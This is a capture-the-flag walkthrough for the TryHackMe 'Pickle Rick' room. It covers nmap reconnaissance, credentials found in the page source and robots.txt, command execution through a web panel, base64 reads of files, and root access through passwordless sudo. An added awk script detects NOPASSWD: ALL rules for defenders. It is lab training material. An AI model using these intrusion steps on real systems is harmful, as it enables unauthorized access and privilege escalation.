Pickle_Rick_Writeup - 5skr0ll3r/Try_Hack_Me GitHub Wiki
As it says itself, it's a web server, so we can check which port the website runs on with nmap:
nmap -Pn -vv <target_ip>
After that, open the website in the browser:
http://<target_ip>:<port>
Check the page source for the username. It's better to run a program like dirbuster, but you can do some digging yourself.
Always check whether there is a robots.txt. The thing you find there is the password for the login page.
After that, go to the login page: http://<ip>/login.php
You can now execute commands on the machine.
Try ls to see what files exist.
To see the content of the file in the current directory, type:
base64 Sup3rS3cretPickl3Ingred.txt | base64 --decode
The second ingredient is in another directory; you can run ls ../.. to see what other directories exist.
The file we want is in user rick's home directory, ../../../home/rick/
So..
base64 ../../../home/rick/'second ingredients' | base64 --decode
Now, the third ingredient is in the root directory. But don't worry, there's no password for sudo, and you can check that by running:
sudo -l
Output:
Matching Defaults entries for www-data on ip-10-10-81-23.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ip-10-10-81-23.eu-west-1.compute.internal:
**(ALL) NOPASSWD: ALL**
Now that we know (we could have known from the beginning), we can use sudo:
sudo base64 ../../../root/3rd.txt | base64 --decode
And you are done!
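Seen from the defender's side, the `sudo -l` output above is the finding to catch: the web server account www-data holds `(ALL) NOPASSWD: ALL`. The script below is an added example, not part of the original writeup, that flags such rules in `sudo -l` output; the function names, the service-account list and the sample text (copied from the output above, plus one constructed narrow rule) are assumptions for illustration.

```sh
#!/bin/sh
# Added example: flag unrestricted passwordless sudo rules in `sudo -l` text.
# audit_sudo_l reads `sudo -l` (or `sudo -l -U <user>`) output on stdin and
# prints "<user> <runas> NOPASSWD:ALL <account-type>" for each risky rule.
# Exit status: 0 if at least one risky rule was found, 1 otherwise.
audit_sudo_l() {
    awk '
        BEGIN {
            user = "unknown"
            # Assumed list of common service accounts; extend for your estate.
            n0 = split("www-data apache nginx httpd nobody", a, " ")
            for (i = 1; i <= n0; i++) svc[a[i]] = 1
        }
        # "User www-data may run the following commands on <host>:"
        /^User .* may run the following commands/ { user = $2; next }
        # Rule lines: "(ALL) NOPASSWD: ALL", "(root) NOPASSWD: /usr/bin/vi", ...
        /NOPASSWD:/ {
            line = $0
            gsub(/\*/, "", line)                # bold markers from a pasted wiki page
            sub(/^[ \t]+/, "", line); sub(/[ \t]+$/, "", line)
            runas = line
            sub(/\).*/, ")", runas)             # keep only the "(runas)" part
            gsub(/[ \t]/, "", runas)
            cmds = line
            sub(/.*NOPASSWD:[ \t]*/, "", cmds)  # command list after the tag
            n = split(cmds, c, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                if (c[i] == "ALL") {            # any command, no password
                    tag = (user in svc) ? "service-account" : "user-account"
                    printf "%s %s NOPASSWD:ALL %s\n", user, runas, tag
                    found = 1
                }
            }
        }
        END { exit(found ? 0 : 1) }
    '
}

# Sample input: the two relevant lines of the sudo -l output shown above.
sample_sudo_l() {
    cat <<'EOF'
User www-data may run the following commands on ip-10-10-81-23.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
EOF
}

sample_sudo_l | audit_sudo_l
```

A rule limited to specific commands, such as `(root) NOPASSWD: /usr/bin/systemctl restart nginx`, is not reported, so the check isolates the blanket grant that made the last step of this room possible.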